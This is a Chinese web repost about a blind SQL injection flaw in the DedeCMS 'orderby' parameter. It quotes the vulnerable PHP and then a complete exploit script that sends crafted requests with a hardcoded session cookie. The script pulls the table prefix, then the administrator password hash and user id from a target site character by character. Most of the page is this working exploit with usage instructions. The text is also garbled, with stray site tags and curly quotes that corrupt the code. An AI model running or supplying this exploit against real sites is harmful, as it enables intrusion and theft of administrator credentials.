织梦惊爆严重注射漏洞 可获管理员密码等

源代码网整理以下//重载列表
if($dopost=="getlist"){
PrintAjaxHead();
GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数
$dsql->Close();
exit();
……
function GetList($dsql,$pageno,$pagesize,$orderby="pubdate"){
global $cfg_phpurl,$cfg_ml;
$jobs = array();
$start = ($pageno-1) * $pagesize;

源代码网整理以下$dsql->SetQuery("Select * From cz_jobs where memberID="".$cfg_ml->M_ID."" order by $orderby desc limit $start,$pagesize ");
$dsql->Execute();//orderby 带入数据库查询
……
----------------------------------------------------------

源代码网整理以下<?
print_r("
--------------------------------------------------------------------------------
DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploit
BY Flyh4t
www.wolvez.org
Thx for all the members of W.S.T and my friend Oldjun
--------------------------------------------------------------------------------
");

源代码网整理以下if ($argc<3) {
print_r("
--------------------------------------------------------------------------------
Usage: php ".$argv[0].’ host path
host: target server (ip/hostname)
path: path to DEDEcms
Example:
php ‘.$argv[0].’ localhost /
——————————————————————————–
‘);
die;
}

源代码网整理以下function sendpacketii($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),’80′);
if (!$ock) {
echo ‘No response from ‘.$host; die;
}
fputs($ock,$packet);
$html=”;
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

源代码网整理以下$host=$argv[1];
$path=$argv[2];
$prefix=”dede_”;
$cookie=”DedeUserID=39255; DedeUserIDckMd5=31283748c5a4b36c; DedeLoginTime=1218471600; DedeLoginTimeckMd5=a7d9577b3b4820fa”;

源代码网整理以下if (($path[0]<>’/") or ($path[strlen($path)-1]<>’/"))
{echo ‘Error… check the path!’; die;}

源代码网整理以下/*get $prefix*/
$packet =”GET “.$path.”/member/guestbook_admin.php?dopost=getlist&pageno=1&orderby=11′ HTTP/1.0 ”;
$packet.=”Host: “.$host.” ”;
$packet.=”Cookie: “.$cookie.” ”;
$packet.=”Connection: Close ”;
sendpacketii($packet);
if (eregi(”in your SQL syntax”,$html))
{
$temp=explode(”From “,$html);
$temp2=explode(”member”,$temp[1]);
if($temp2[0])
$prefix=$temp2[0];
echo “[+]prefix -> “.$prefix.” ”;
}

源代码网整理以下$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
echo “[~]exploting now,plz waiting ”;

源代码网整理以下/*get password*/
$j=1;$password=”";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+pwd+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0 ”;
$packet.=”Host: “.$host.” ”;
$packet.=”Cookie: “.$cookie.” ”;
$packet.=”Connection: Close ”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$password.=chr($i);echo”[+]pwd:”.$password.” ”;break;}
}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

源代码网整理以下/*get userid*/
$j=1;$admin=”";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql=”orderby=11+and+If(ASCII(SUBSTRING((SELECT+userid+FROM+”.$prefix.”admin+where+id=1),”.$j.”,1))=”.$i.”,1,(SELECT+pwd+FROM+”.$prefix.”member))”;
$packet =”GET “.$path.”member/guestbook_admin.php?dopost=getlist&pageno=1&”.$sql.” HTTP/1.0 ”;
$packet.=”Host: “.$host.” ”;
$packet.=”Cookie: “.$cookie.” ”;
$packet.=”Connection: Close ”;
sendpacketii($packet);
if (!eregi(”Subquery returns more than 1 row”,$html)) {$admin.=chr($i);echo”[+]userid:”.$admin.” ”;break;}
if ($i==255) {die(”Exploit failed…”);}
}
$j++;
}

源代码网整理以下print_r(’
——————————————————————————–
[+]userid -> ‘.$admin.’
[+]pwd(md5 24位) -> ‘.$password.’
——————————————————————————–
‘);
function is_hash($hash)
{
if (ereg(”^[a-f0-9]{24}”,trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {echo “Exploit succeeded…”;}
else {echo “Exploit failed…”;}
?>